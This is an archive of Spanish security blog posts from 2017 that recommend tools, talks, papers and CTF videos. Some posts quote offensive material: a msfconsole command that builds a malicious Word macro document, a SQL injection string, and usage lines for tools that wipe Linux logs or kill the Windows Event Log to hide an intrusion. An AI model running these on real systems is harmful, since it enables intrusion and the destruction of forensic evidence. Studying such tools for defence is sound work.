viernes, 23 de junio de 2017

Paper.- Tempest ataca de nuevo contra AES-256

Para los que no sepáis que es un ataque Tempest, es el espionaje de los sistemas de información a través de fugas de emanaciones, incluyendo señales, sonidos y vibraciones de radio o eléctricas.
 

Para mi, hace mucho que no oía hablar de los ataques Tempest y pensaba que era algo relegado al pasado pero veo que no, Ahora han vuelto y con mas fuerza y fastidiando al algoritmo AES-256.

Enlace al paper:
Sed Buenos ;) 

miércoles, 21 de junio de 2017

Slides.- ZAP vs BurpSuite

Siempre me he preguntado cuando valía la pena usar BurpSuite o ZAP ya que par mi eran herramientas muy parecidas. Hoy quiero que os quedéis con las Slides 9, 10 y 11 de la siguiente presentación y veréis que donde no llega una llega la otra. 


Así que esto me ha abierto un poco mi cabeza llena de serrín y ya que me voy a poner a repasar las diferencias entre BurpSuite y Zap quiero recomendaros dos guías del amigo Snifer donde nos muestra como utilizar debidamente estas herramientas. 


Sed Buenos ;) 

martes, 20 de junio de 2017

Vídeo.- Whatsapp y El abusón de las features

Ya he recomendado por aquí alguna charla de [Daniel Martinez] pero hoy me ha asustado y tengo algunas preguntas que espero que me respondáis en los comentarios. La charla que dio Daniel en la ROOTED CON 2016 sobre Whatsapp donde demostraba que las fotos y los vídeos que compartimos son subidos a sus servidores y se nos muestran a través de una URL. 


Una vez visto el vídeo, aquí ve mi pregunta. Entendiendo que el el cifrado End to End llego sobre el día 6 de Abril del año pasado y que la charla se dio en los días 3, 4 y 5 de Marzo de 2016  ¿Alguien sabe si ahora estas imágenes o vídeos van cifrados?  Entiendo que si, al igual que hará telegram. Pero si lo confirmáis me quedo mas tranquilo y reinstalo el Whatsapp. 

Sed Buenos ;) 

lunes, 19 de junio de 2017

Herramienta.- Pwnbox

Los [contenedores Docker] se han venido para quedarse y cada vez me sorprende mas sus  aplicaciones. Por ejemplo [Harold Rodriguez] lo ha aplicado a algo que nos gusta a todos que son las CTFs (Capture The Flag),


Pues Pwnbox es un contenedor Docker que contiene varias herramientas para el reversing de binarios y para su explotación.  Una pasada pero un poco difícil de instalar, aunque en el GitHub encontrareis como hacerlo paso por paso. 

Enlace a la herramienta: 


Sed Bueno ;)

domingo, 18 de junio de 2017

Vídeo.- HackThis SQL 2 - Query que te Query

Hoy es Domingo  por lo que toca vídeo y en este reto, si que Kazukun se ha tenido que estrujar la cabeza y aprender un poco de peticiones SQL antes de realizarlo. Pero, espero que aprendáis todos que, con un poco de estudio y de preparación se puede aprender y solucionar retos tan divertidos como este.


Sed Buenos ;)

viernes, 16 de junio de 2017

Vídeo.- Universal Radio Hacker

Ya sabéis que llevo tiempo mirando la mejor manera de introducirme en el mundo del Software Defined Radio (SDR) así que me he quedado a cuadros al ver la siguiente herramienta y de conocer que su creador [Johannes Pohl] sube vídeos a Youtube enseñando como usarlas. 

Os dejo con el vídeo que merece mucho la pena: 


Y aquí está el enlace a la herramienta, tendréis que pegaros un poco con las dependencias, pero vale la pena. 

Sed Buenos ;) 

jueves, 15 de junio de 2017

SSHCheck .- Revisa tus conexiones SSH

Muchas veces no conectamos por SSH a nuestros equipos sin revisar correctamente si la conexión es segura o no. Por eso hoy os recomiendo SSHCheck, una aplicación web donde podemos auditar cualquier IP o Hostname que nos sepamos sin necesidad de abrir nuestro Nesus, OpenVAS o Nexpose.


Ademas la info que da es bastante completa sobretodo a lo que cifrados algoritmos de cifrado. Lo mira todo (claro está que no se pondrá a comprobar contraseñas por defecto) . 

Enlace a la la herramienta: 
Sed Buenos ;) 

miércoles, 14 de junio de 2017

Vídeo.- Historias para no dormir

Hoy me he levantado con ganas de ver ponencias y me he acordad del bueno de Lorenzo Martinez.  Así que me he puesto a buscar ponencias y después de un tengui tengui falti tuneado a visto visto no visto,  he visto por twitter que habían publicado su charla en el Mundo Hacker Day 2017 así que me he puesto a verla. 

La verdad es que me esperaba una charla sobre forense sobre rusos, no se porque, pero me he encontrado con un muy buen repaso a APT famosas que han ido surgiendo en los últimos años. Muy recomendable. 


Sed Buenos ;) 

martes, 13 de junio de 2017

CheatSheet.- Data Science in Python

Bueno, cada día que pasa parece que este blog se encamina a ser unicamente de Python pero es que cada vez me sorprende mas este lenguaje de programación. Hoy, aunque no os recomendaría Python para esto, os recomiendo esta "chuleta" sobre PANDAS (No, los osos no ...) una librería construida sobre Numpy para la  estructura y el análisis de datos. 


Inforgrafia en grande y mucha mas información: 

Sed Buenos ;)

lunes, 12 de junio de 2017

Filtrar información desde los LEDs de tu router.

Esto me ha parecido un pasada. Ya no podemos fiarnos ni de los LEDs de nuestro router gracias al buen trabajo de la gente de Negev (Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici). 

Estos señores se dedicaron a relacionar la información que pasa por un Switch o un router con los leds de estos dispositivos con el fin de grabar la secuencia con una cámara remota o con un sensor óptico. No será muy rápido, pero como mínimo es muy curioso y merece que os leáis el Paper.


Enlace al paper: 
Sed Buenos ;) 

domingo, 11 de junio de 2017

HackThis SQL 1 - 'or'1'='1

Hoy es domingo y toca vídeo de HackThis, aunque este reto ya salió en el apartado de basics de esta página de retos pero nunca está de mas recordar que 'or'1'='1 te pude abrir muchas puertas si el programador de turno no ha hecho bien su trabajo.

Sea como sea, hoy Kazukun nos muestra como pasarnos el primer reto del apartado SQL Injection de HackThis .



Sed Buenos ;)

viernes, 9 de junio de 2017

PDO.- Python + Have I been pwned?

Hace mucho que tenia esta idea en la mente. ¿Por qué no me creo un script en Python que consulte a [Have I Been Pwned] (la página esa para ver si tus pass han sido filtradas por algún lado) para que cada día revise si me han Pwneado?

Pues nada me puse a mirar la página y vi que el servicio de Notify me! en el que te avisan por correo si tu contraseña ha sido filtrada no me convencía, pero al ver el apartado API vino la luz de la inspiración.

Solo hace falta consultar la siguiente URL substituyendo {account} por la dirección de correo que queráis buscar y ya lo tenemos:
  • GET https://haveibeenpwned.com/api/v2/breachedaccount/{account} 
Por lo que lo tenia fácil para preparar mi script en python  así que para jugar primero cree a GAS. Un script que permite buscar cualquier cuenta y te devuelve la confirmación de que estás jodido y las fuentes donde los malos pueden encontrar tu pass. 

Ejemplo de GAS: 


Así que, una vez ya programado GAS lo modifique para crear a PDO (Powned Daemon Oriented) y esta ya podía consultar todas las cuentas de correo que le añada a un txt. Pues esto, fusionado con programarlo para que se ejecute cada vez que abro el equipo ya tengo lo que veníamos a buscar. 
 
Cada día al encender el PC el script monitorizará por mi si mis pass están al alcance de todo Internet y eso me tranquiliza un poco

Ejemplo de como funciona PDO:

 

Es una idea loca y fácil, pero me ha molado hacerla. Aquí tenéis el enlace a mi GitHub para que podáis jugar con los scripts:

Sed Buenos ;)

jueves, 8 de junio de 2017

StateX.-Las gracias a quien hay de dárselas

Siempre empiezo mis entradas con una mención al día con termino como por ejemplo: Hoy, ayer, es Viernes ... y la verdad es que me gusta. Bueno, mas bien ya me he acostumbrado a ella y creo que se adecuan bien a mi manera de escribir en este blog.  Vamos, que improviso un montón.


Esta entrada está un poco mas preparada que las demás ya que en esta semana y estamos a jueves, han pasado unas cuantas cosas de las que os tengo que estar agradecido  a vosotros, mis lectores.

Vamos por puntos:
  1. Gracias a todos los que aportáis valor a este blog con vuestros comentarios, entradas, noticias, imágenes e ideas. (Ya sabéis todos quien sois)
  2. Gracias a los que apoyáis a Tonto ... No me esperaba que a la gente le gustara  tanto y que ahora estén aportando ideas en el [foro]. 
  3. Gracias a todos los que me corregís. La verdad, jode pero se aprende mas y aveces pasa cosas muy chulas. Por ejemplo ayer el bueno de Snifer me corrigió con el tema de para que servia RHost y LHost de metasploit y al final acabamos haciéndole una pregunta al creador de la entrada que recomendaba. Así aprendimos. 
Y ya está, en esta semana me habéis ayudado mas que en años y eso es de agradecer. Este blog se creó con la necesidad de aprender muchas cosas sobre este mundo. Hasta hemos pasado por bastantes estados: Un síndrome de  Diógenes digital al acumular documentos, frustración por no poder leerlas todas, aprobamos el CEH y como no por momentos de euforia y de días malos.

Nunca he tenido mas reputación de la que me habéis dado vosotros y espero que sigáis así aportando, ayudando y corrigiendo. Os lo agradeceré siempre y me gustaría, quizás, en un futuro, deje de llamaros lectores y pueda llamaros comunidad.

Sed Buenos ;)

miércoles, 7 de junio de 2017

Metasploit.- Paso a paso.

Hace mucho que no toco Metasploit, miento el otro día lo abrí para ver si estaba el mítico exploit de samba pero no mucho mas, pero con la que está cayendo últimamente no solo tendría que empezar a refrescar Ruby si no también Metasploit. 


Por eso y ya que voy a refrescarlo esta tarde, os dejo con la guía Step by step Metasploit del blog zero-day.io donde no solo hacen una repaso al famoso framework si no que ademas te explican la fase de reconocimiento con un par de herramientas famosas también y se para a explicar por que debemos utilizar Rhost cuando estamos lanzando un exploit desde fuera de nuestra red y Lhost cuando la maquina victima esta dentro. Muy recomendable. 

Enlace a la guía: 
Sed Buenos ;) 

martes, 6 de junio de 2017

Antivmdetection.- Analiza Malware tranquilamente.

Hemos hablado mucho sobre [que tipo de información buscaba un Malware] para descubrir si está corriendo en una máquina virtual y de esta manera cambiar su manera de actuar para que no podamos descubrir que hace. Por eso, Mikael Keri ha creado un script para preparar nuestro Windows para que podamos analizar el bicho tranquilamente sin que mute a un proceso inocuo.


Muchas mas información y enlace al GitHub:

Aprovechadlo antes de que los malos modifiquen sus códigos para saltarse esto también. 

Sed Buenos ;) 

domingo, 4 de junio de 2017

HackThis Javascript 5.- Devuélveme la pass 2 la venganza

Domingo, vídeo y manta ya que por aquí llueve un poco y se está la mar de a gusto. Bueno, otro error típico en Javascript,  esta vez estaba un poco mas escondido pero en linea con el Javascript 3 Kazukun consigue obtener la pass de este reto mediante la invocación del comando alert().

Esperemos que os guste: 


Sed Buenos ;) 

viernes, 2 de junio de 2017

Vídeo.- Bienvenidos a Hackerville

Esto ha sido un rumor en mi casa desde que empezamos a trastear en el mundo de las seguridad informática, un pueblo lleno de hackers haciendo barrabasadas todo el día nos parecía super guay  ... no sabíamos nada pero la curiosidad de lo que se hace en este pueblo de Rumanía siempre me ha intrigado.  

Así que hoy os recomiendo este vídeo que han compartido en el grupo de Facebook de Hackstory para que como yo hace unos años descubráis que no es tan guay, ni chulo como parece. 


Sed Buenos ;)

jueves, 1 de junio de 2017

Infografía.- Vectores de ataque de la Ingeniería Social

Hace un par de días que los he dedicado a algo muy parecido a la ingeniería social y quieras o no, si trabajas en este mundo, no puedes evitar extrapolarlo para hacer el mal. Por eso ayer os compartí el vídeo de Google y hoy os vamos a ver los diferentes vectores de ataque que tiene la ingeniería social para que nada pueda sorprendernos. 


Más información y fuente:

Sed Buenos ;)

miércoles, 31 de mayo de 2017

Vídeo.- Google: Cómo evitar ataques de ingeniería social

Ya sabéis. que al final por mucho que aseguremos nuestras máquinas el mejor antivirus somos nosotros mismo. Por eso debemos estar formado y atentos a cualquier tontería que veamos o detectemos como sospechosa.

Google lo sabe y por eso ha publicado algunas claves para concienciarnos de las amenazas y ver como tenemos que reaccionar para solucionarlas.


Sed Buenos ;) 

martes, 30 de mayo de 2017

Proyecto.- Pray for tonto

Para los nuevos que leéis este blog Tonto es un asistente virtual que empecé a programar para aprender Python y que poco a poco ha ido tomando forma. Pero ya hace meses que no he escrito ni una linea de su código justo cuando cree el foro Pray for Tonto para que la gente que me enviaba recomendaciones y pedía consejo se pudieran responder los unos a los otros y de esta manera jugar con la tecnología, que es lo que nos gusta al fin y al cabo. 

Pero al ver que casi nadie aportaba, al final, me olvide de ella hasta que recibí en mi inbox, el siguiente mensaje: 


Además de tocarme muy fuerte la "patata", habían varias ideas chulas en los hilos, así que creo que la poca colaboración que ha habido se debe a que no he movido el tema ya que la gente quiere colaborar. 


De esta manera ahora tendremos el siguiente muñeco a la derecha del blog por si queréis colaborar y yo me comprometo a aportar mas valía a este foro. 

Enlaces para que los que no sepáis que es Tonto:

 Sed Buenos ;) 

lunes, 29 de mayo de 2017

PRET.- No mires la basura mira a tu impresora.

Por si no lo sabéis en muchas empresas la basura se trata de una manera diferente a lo que estamos acostumbrados nosotros en casa. Esto es debido a que se trata con información sensible o de importancia y no queremos que un tipo, rebuscando en la basura, obtenga dicha información.  A esto se le llama dumpester diving, pero lo que ahora está de moda es escarbar en tu impresora. 


PRET es una herramienta que nos permite descubrir las impresoras conectadas a nuestra red y explotarlas para que nos devuelva y además el usage es simple. ¿Qué mas podemos pedir?

  • usage: pret.py [opcion] target {ps,pjl,pcl}

Mucha mas información y link al repositorio de la herramienta: 
Sed Buenos ;) 

domingo, 28 de mayo de 2017

Vídeo.- Una invitación para HackTheBox

Hoy es domingo y toca vídeo. Pero quiero pararme un poco a explicaros que es HackTheBox y por que mola el capítulo de hoy.

HackTheBox es una pagina dedicada a probar técnicas relacionadas con pentesting e intercambiar ideas con la gente de su comunidad. Pero lo que mas me gusta es que has de hackear la página para encontrar la Key de invitación que te permita registrarte en ella. 

Os pego el enlace aquí abajo y si realmente queréis intentarlo no os miréis el vídeo hasta que no os sea necesario: 
Hace mucho nos dijeron que esto de ver el código fuente de una página no servia para nada. No dejan de tener parte de razón pero no deja de ser una de las principales técnicas que tiene un Hacker para trastear con páginas web.

En este caso Kazukun nos muestra como loguearnos en la pagina de "retos" Hack The Box la cual has de hackear para poder obtener una invitación.

Esperamos que os guste:



Sed Buenos ;)  

viernes, 26 de mayo de 2017

Vídeo.- Raspberry + TOR

Creo que este "artefacto" es uno de los primeros que debería tener alguien que le mole cacharrera con la seguridad informática. Es fácil de montar si no se te va mucho la cabeza probando cosas, es útil y aprendes un montón sobre configuraciones de linux y de tor. 

Además en este vídeo lo explican genial y hay un tío vestido de cura, que mas podemos pedir. 



Sed Buenos ;) 

jueves, 25 de mayo de 2017

Infografia.- Como funciona Wannacry paso por paso

Como buen curioso de este mundo, saber como actuaba el Ransomware de moda en las últimas semanas ha sido mi perdición así que si tenis la misma curiosidad que yo os va encantar esta infografia donde se muestra paso por paso como funciona este malware. Con pelos, señales y hasta el boletín que tendríais que tener instalado. 


Sed Buenos ;)

miércoles, 24 de mayo de 2017

Microsploit.- Trasteando con Office y Metasploit.

La verdad es que no se muy bien como calificar a este script pero la verdad es que es una buena herramienta si quieres trastear con documentos Office maliciosos. No se si os pasará a vosotros pero metasploit se me hace un poco pesado a la hora de trabajar con el, sobretodo si no tienes muy claro que exploit en concreto estas buscando por eso Microsploit mola. Gracias al menú podemos seleccionar que tipo de bicho queremos y el script por si solo interectua con metasploit y nos genera  el documento con macros en la carpeta output.


Ejemplo de como actúa el script con metasploit: 

"$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set target 1; exploit; exit -y'" 
echo "" 
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm

 Recomendable, pero siempre sabiendo lo que se está haciendo (aquí se ha hablado mucho sobre word con macros) y se necesitarán unas nociones básicas de metasploit.

Enlace al GitHub:



Sed Buenos ;)

martes, 23 de mayo de 2017

Aprendiendo Bluetooth Hacker MODE :ON

Ayer en el metro, mientras escuchaba música, me puse a mirar a toda la gente que estaba embobada mirando su smartphone y pensé en cuantos de ellos tendrían el Bluetooth activado por defecto y en lo que podría hacer si supiera tanto como [Pablo F. Iglesias] pero como aun no, por algun lado tendré que empezar. 


Así que, cual ha sido me sorpresa al encontrarme con el Git Hub de [Brando Asuncion] donde le ha hecho ingeniería inversa al protocolo de la manera mas Hacker que se me ocurre. Brando se ha creado un script que emula ser un radar de dispositivos bluetooth, ha escuchado la salida con Wireshark y después ha recopilado toda la información sobre la petición y la respuesta en su repositorio.

Muy recomendable y bien explicado, ademas tenéis los script que ha usado para reproducir el experimento: 



Sed Buenos ;) 


lunes, 22 de mayo de 2017

MS17-010 Usado para minear Monero

Si os pensabais que a nadie mas se le había ocurrido usar Eternal Blue ibais muy equivocados. Proofpoint analizando WannaCry descubrieron una clase de Malware (llamado Adylkuzz) que usaba EternalBlue y DoublePulsar para instalar de manera masiva un minero de la criptomoneda Monero. Se calcula que ha tenido un alcance parecido al famoso Ransomware pero, como no da un mensaje de alerta pues no ha saltado a la luz pública.


Hoy os recomiendo el post de proofpoint donde explican como lo descubrieron y como lo destriparon. No os voy a explicar mucho mas ya que espero que os lo leáis.  Merece la pena: 

domingo, 21 de mayo de 2017

HackThis Javascript 3.- Devuelveme la pass

Domingo y hoy toca ver la solución al tercer reto de Javascript en HackThis. Javascript mola mil pero siempre y cuando hagamos las cosas bien. así que no dejemos las pass harcodeadas en el código ya que es muy fácil llamar con un alert() a la variable en la que está metida la pass. De esta manera Kazukun nos muestra como solucionar el tercer reto de Javascript en HackThis.

Sed Buenos ;)

viernes, 19 de mayo de 2017

Vídeo - La Brecha Digital - Cifra tu mundo

Viernes y hoy toca vídeo para desgrasar de tanta actualizad y de tanto Wannacry pero que nos permita estar alerta y de como reaccionar para blindarnos en la red de red. 
Tor, VPN, VoIP segura, Seguridad WiFi, Cifrado de Archivos para almacenar en la nube, uso de una raspberry pi para limpiar el unidades USB sospechosas, sistema operativo seguro Qubes OS y más.

Espero que os guste y que os sirva como a mi para interesaros un poco mas en este mundo.



Sed Buenos ;) 

jueves, 18 de mayo de 2017

Infografia.- El Balance de WannaCry

Bueno, después de casi una semana con la resaca del WannaCry me he preguntado cuanta gente a pagado o cuanto es el daño que ha causado. Así que ha sido una sorpresa que el ABC haya sacado una infografia donde hacen el recuento por nosotros.  No se bien bien de donde han sacado todos los datos pero en términos generales me sirve para hacerme una idea y creo que a vosotros también. 


Sed Buenos ;)

miércoles, 17 de mayo de 2017

Podcast.- Podcast Dame una Shell - 2

Dame una Shell, el podcast de nuestro amigo Snifer, se está convirtiendo en uno de mis podcast de referencia y no es para menos. Me encanta todo lo que salga de la cominudad y en esta edición de podcast Snifer la ha clavado. No solo le ha dado un buen repaso al Keylogger preinstalado de HP que ha sido totalmente tapado por el tema de WanaCry si no que también ha tratado el tema del Kill Switch (Ya sabies, el episodio del joven que localizo la dirección de descarga de WanaCry y la compro para par la primera versión) que a mi me tenia tan extrañado. 

Le ha salido un podcast redondo y me da envidia no poder participar. Envidia te tengo Dino! 


Muchas mas información, enlaces y fuente:



Sed Buenos ;) 

martes, 16 de mayo de 2017

Vídeo.- Python. Más rápido que C

No, aun no me queméis por hereje, se que el titulo puede llegar un poco a engaño y digo un poco por que Facundo Batista a trasteado un monto para compararlo con C hasta el punto de descubrir que optimizándolo de la forma correcta Python no es mucho mas lento que C y ganamos velocidad en escribirlo. 

Super-entretenido y curioso. Se tenéis curiosidad por ver como funcionan los lenguajes de programación por debajo os recomiendo que lo veáis. 


Sed Buenos ;) 

lunes, 15 de mayo de 2017

Stop using SMBv1

Por fin es Lunes y el estrés por el tema de Wanacry ha disminuido (al menos a mi alrededor) aunque lo estén repitiendo todo el día en las noticias. Yo por mi parte, ya que lo estaba viviendo, e intentado ver lo menos posible la información que desprendían los medios y centrarme en la comunidad, donde he podido encontrar aportaciones tan chulas como: [El GitHub de Wannacrypt0r-FACTSHEET] donde posiblemente esta toda la info que necesitas saber sobre este malware, [la entrada de hoy de fwhibbit] sobre este Malware como referencia a todos los que han escrito sobre este tema o [la entrada del Maligno  que el día después del ataque] se atrevió a explicar lo que paso con Telefónica y ademas como funcionaba el malware, es para darle un besico en el gorro.

Así que a mi solo me queda deciros lo siguiente, dejad de usar SMBv1, parchead y/o aplicad el siguiente Workaround en vuestras PowerShells:

  • set-smbserverconfiguration -EnableSMB1Protocol $false
Ah, y mostraros la siguientes viñetas que me han hecho mucha gracia: 


Sed Buenos 

domingo, 14 de mayo de 2017

HackThis Javascript 2.- Saber mates a veces va bien!

Después de un fin de semana raro entre el Ransomware y los cinco puntos en eurovisión cuando nos merecíamos los cero puntos, volvemos con los vídeos del Domingo.

Javascript es un lenguaje de programación que nos deja hacer un montón de cosas y entre ellas está la posibilidad de ayudarnos a realizar operaciones matemáticas. Pero que pasa si nos encontramos con un reto que usa Javascript para calcular que la pass es correcta.

Hoy, Kazukun, nos muestra como pasarnos el reto numero dos de Javascript jugando con las formulas. Esperamos que os guste.


Sed Buenos ;)

viernes, 12 de mayo de 2017

The Keylogger .- Conexant HD Audio Driver Package

Después de todo el el revuelo del [Ransomware de Telefónica] que ha llenado las redes sociales de revuelo y gozo, ha tapado uno de los problemas por parte de HP mas flagrantes de los últimos años. 


Resulta que han encontrado un "keylogger" llamado MicTray64.exe que se instala junto a los drivers Conexant HD Audio Driver y monitoriza las pulsaciones de tu teclado y las guarda en C:\Users\Public\MicTray.log.  Vamos, es genial y justo lo que quieres cuando te compras un portátil. Indignado me hallo.

Ordenadores afectados:
  • HP EliteBook 820 G3 Notebook PC 
  • HP EliteBook 828 G3 Notebook PC 
  • HP EliteBook 840 G3 Notebook PC 
  • HP EliteBook 848 G3 Notebook PC 
  • HP EliteBook 850 G3 Notebook PC 
  • HP ProBook 640 G2 Notebook PC 
  • HP ProBook 650 G2 Notebook PC 
  • HP ProBook 645 G2 Notebook PC 
  • HP ProBook 655 G2 Notebook PC 
  • HP ProBook 450 G3 Notebook PC 
  • HP ProBook 430 G3 Notebook PC 
  • HP ProBook 440 G3 Notebook PC 
  • HP ProBook 446 G3 Notebook PC 
  • HP ProBook 470 G3 Notebook PC 
  • HP ProBook 455 G3 Notebook PC 
  • HP EliteBook 725 G3 Notebook PC 
  • HP EliteBook 745 G3 Notebook PC 
  • HP EliteBook 755 G3 Notebook PC 
  • HP EliteBook 1030 G1 Notebook PC 
  • HP ZBook 15u G3 Mobile Workstation 
  • HP Elite x2 1012 G1 Tablet 
  • HP Elite x2 1012 G1 with Travel Keyboard 
  • HP Elite x2 1012 G1 Advanced Keyboard 
  • HP EliteBook Folio 1040 G3 Notebook PC 
  • HP ZBook 17 G3 Mobile Workstation 
  • HP ZBook 15 G3 Mobile Workstation 
  • HP ZBook Studio G3 Mobile Workstation 
  • HP EliteBook Folio G1 Notebook PC
Solución:
  • Borra los ejecutables MicTray y los archivos de log relacionados a este. 
Mucha mas información y fuente:

Sed Buenos ;)

jueves, 11 de mayo de 2017

INCIBE.- Glosario de términos de ciberseguridad

Muchas veces no nos damos cuenta pero si alguien nos cogiera por la calle hablando de nuestras cosas de "Hackers" seguro que no entendería la mitad de las palabras que decimos pues, lo mismo le pasa a tu Director y muchas veces has de ponerte en su piel y explicarle las cosas como se deben. 


INCIBE ya se ha adelantado a esto y ha preparado un glosario de términos para te puede ser muy útil si eres nuevo en este mundo o te quieres enterar de lo que hablan tus empleados.  

Link al Glosario de INCIBE: 

Bueno, aunque si emplean un lenguaje mas técnico, ni con el glosario te vas a salvar.

Sed Buenos ;)

miércoles, 10 de mayo de 2017

NoJail.- Borrando voy, borrando vengo.

Hoy me he encontrado de morros con el repositorio freedom fighting de Ivan Kwiatkowski  y no me he podido evitar curiosear en su interior. Este repositorio tiene tres scripts en Python destinados a ayudarte a borrar el posible rastro que puedas dejar pero el que mas me ha llamado la atención es NoJail. 


NoJail está destinado a buscar los posibles logs que puedan haber en determinadas rutas de un Linux remoto, borrarlos y verificar que han sido borrados. 

Rutas Linux a las que accede para borrar logs: 
  • /var/run/utmp
  • /var/log/wtmp
  • /var/log/btmp 
  • /var/log/lastlog
  • /var/**/*.log 
  • Cualquier otra ruta que le piquemos manualmente. 

También como podréis ver a continuación, tiene un uso muy simple:
  • ./nojail.py --user root --ip IP /etc/app/logs/access.log --check
Enlace al repositorio donde encontrareis muchas mas información:
Además casi no tiene dependencias y en Python eso siempre es un Win. 

Sed Buenos ;) 

Scanless.- Varios escaners Web en un comando.

Si nunca lo habéis buscado, existes muchas aplicaciones web que nos permiten hacer un escaneo de puertos a otra máquina con solo introducir la IP o el dominio de una máquina. Así que, sabiendo que con Python podemos hacer consultas a páginas web y parsear el resultado, Austin Jackson ha cogido esta idea y se ha montado una herramienta muy fácil de usar que nos permite escanear por cinco escaners de puertos distintos con solo un comando. Fácil, cómodo y si queremos podemos usar los 5 a la vez para una sola máquina. 



Escaners que utiliza:
  • yougetsignal
  • viewdns
  • hackertarget
  • ipfingerprints
  • pingeu
Usage:
  • scanless.py [-h] [-t TARGET] [-s SCANNER] [-l] [-a]
Más información y enlace a la herramienta:

Sed Buenos ;) 

lunes, 8 de mayo de 2017

Wiki.- Ultimate Android Reference

Si hace unos días hablábamos de la [wiki asombrosa sobre Hacking] donde podríamos encontrar recursos, herramientas o papers referentes para diferentes técnicas de Hacking, hoy quiero recomendaros la  Ultimate Android Reference donde encontraremos un montón den información sobre Android. 


Como no, también está en GitHub pero me ha ha venido muy bien para calmar mi curiosidad sobre la persistencia de archivos en Android. Igual que con la anterior wiki aquí podremos encontrar de todo y parece que se actualiza constantemente así que, muy recomendable. 


Enlace al Git Hub:


Sed Buenos ;) 

domingo, 7 de mayo de 2017

HackThis Javascript 1.- Where is my code!

Bueno, hoy es domingo y ya sabéis lo que toca, después de pasar por "todos" los retos intermediate (Si todos por que el 5 no está disponible a día de hoy) Kazukun se mete de lleno con el primer reto de la serie Javascript, el cual tendrá que buscar el código que contiene la palabra para pasar al siguiente reto.

Esperamos que os guste:


Sed Buenos ;) 

viernes, 5 de mayo de 2017

Vídeo.- MalwareAnalysisForHedgehogs

Hoy no quiero recomendaros un vídeo solo, si no un canal de youtube como tal, [MalwareAnalysisForHedgehogs] suben cada semana un vídeo donde trastean con algún Malware y hacen su análisis o cada cuando les da hace un podcast hablando de lo que a ellos les interesa y dando información de por donde empezar a los novatos como yo. Muy recomendable. 

Aquí tenéis un ejemplo:


Sed Buenos ;) 

jueves, 4 de mayo de 2017

Infografía.- Como ser contratado como Pentester

Hace unos días tuvimos por aquí la genial noticia de que Kazukun fue llamado para una entrevista para trabajar en este mundo que nos encanta a todos y creo que esta infografía no solo le va ir bien a el si no que a todos los estudiantes de informática que os mola todo esto también. 

No solo os quedéis con la infografía hoy os recomiendo para entender cada uno de los puntos: 


Muchas mas información sobre cada uno de los puntos de la infografía y fuente: 


Sed Buenos ;) 

miércoles, 3 de mayo de 2017

PowerShell.- Invoke-Phant0m

Una herramienta mas para PowerShell que, si alguna vez soñamos en dejar una máquina sin rastro de que hemos estado allí, nos ayudará un montón a eliminar procesos y subprocesos relacionados con nuestra actividad para que no aparezcan en el registro de Windows. 

"Este script, camina en las pilas del subproceso Event Log Service (específicamente svchost.exe) e identifica los hilos del registro de sucesos para eliminar los subprocesos del Event Log Service, por lo tanto, el sistema no podrá recopilar registros y al mismo tiempo, el Event Log Service aparecerá en ejecución."
 Vídeo de como funciona este script:


 


Enlace a la herramienta:
 
Sed Buenos ;)

martes, 2 de mayo de 2017

Paper.- El mal uso de puertos en varias App.

Siempre se ha dicho que los smartphones son ordenadores de bolsillo. Así que, ¿nunca os habéis parado de pensar qué puertos abiertos tendrán estos dispositivos? pues Yunhan Jack Jia, Qi Alfred Chen, Yikai Lin, Chao Kong, Z. Morley Mao de la Universidad de Michigan, Si y descubrieron algo muy chulo. ¿Alguna vez habéis hecho un Nmap a un smartphone? Pues si lo hacéis descubriréis lo chulos que pueden ser estos dispositivos a ese nivel, pero la buena gente de la Universidad de Michigan han descubierto que muchas aplicaciones pueden dejar puertos abiertos. Por lo que ya os podéis pensar el estropicio que se puede hacer.

Enlace al paper: 

Vídeo muestra del "estropicio":


Sed Buenos ;) 

lunes, 1 de mayo de 2017

Wiki.- Awesome Hacking

Si hace un par de días hablábamos de [Awesome CVE] un repositorio de vulnerabilidades con sus respectivas PoC (Pruebas de concepto) hoy quiero recomendaros el repositorio Awesome Hacking una especie de Wiki en GitHub, donde hay un montón de información sobre hacking y sobre cualquier tecnología que queráis trastear. 


Muy completo, hay un arsenal para hacer pruebas de la seguridad de vuestra wifi, información para que "experimentéis"con vuestro auto y/o si no os apetece, siempre podéis animaros a solucionar una de las CTFs que hay en este repositorio. 

Enlace al GitHub:


Sed Buenos ;)



domingo, 30 de abril de 2017

Vídeo.- HackThis Intermediate 6 .- "SQL"ame esta

Después de dos semanas sin vídeo hoy volvemos con el reto numero 6 de HackThis.  No siempre podemos tirar de SQLmap y siempre está bien aprender como debemos "tunear" una consulta a una base de da SQL dependiendo del código fuente de la página. No es fácil pero tampoco difícil y hoy Kazukun nos muestra como pasar el reto 6 de HackThis adecuando dicha consulta. 

Ademas hemos mejorado la entrada de los vídeos así que espero que os gusten un poco mas:


Sed Buenos ;) 

viernes, 28 de abril de 2017

Infografía.- 10 + 1 consejos sobre seguridad

Es viernes y no tengo un vídeo preparado pero INCIBE ha sacado una nueva infografía dedicada a explicar 11 consejos fáciles de aplicar para mejorar la seguridad informática de tu empresa y he tenido que aprovecharlo.  Además son consejos de sentido común y muy fáciles de aplicar así que tomad nota. 



La infografía mas grande y mucha más información:
Sed Buenos ;)

jueves, 27 de abril de 2017

PoC.- Awesome CVE

Ayer me encontré de cara con la siguiente entrada de [CyberHades] en super-conocido blog [Segu·Info] donde se presentaba Awesome CVE PoC un repositorio de GitHUb donde describen unas 80 vulnerabilidades y nos ofrece una prueba de concepto para cada una de estas vulnerabilidades.  Ademas, están actualizadas al día así que yo no puedo pedir nada mas, es un gran sistema para aprender aprender a romper cosas y para saber que procedimiento ha utilizado la gente que programa estas PoCs o exploits para encontrar y explotar estas vulnerabilidades. 


Vulnerabilidades descritas en el repositorio:
  • CVE-2013-6632
  • CVE-2014-1705
  • CVE-2014-3176
  • CVE-2014-7927
  • CVE-2014-7928
  • CVE-2015-0235
  • CVE-2015-1233
  • CVE-2015-1242
  • CVE-2015-3306
  • CVE-2015-6764
  • CVE-2015-6771
  • CVE-2015-7450
  • CVE-2015-7545
  • CVE-2015-8584
  • CVE-2016-0728
  • CVE-2016-1646
  • CVE-2016-1653
  • CVE-2016-1665
  • CVE-2016-1669
  • CVE-2016-1677
  • CVE-2016-1688
  • CVE-2016-1857
  • CVE-2016-3386
  • CVE-2016-4622
  • CVE-2016-4734
  • CVE-2016-5129
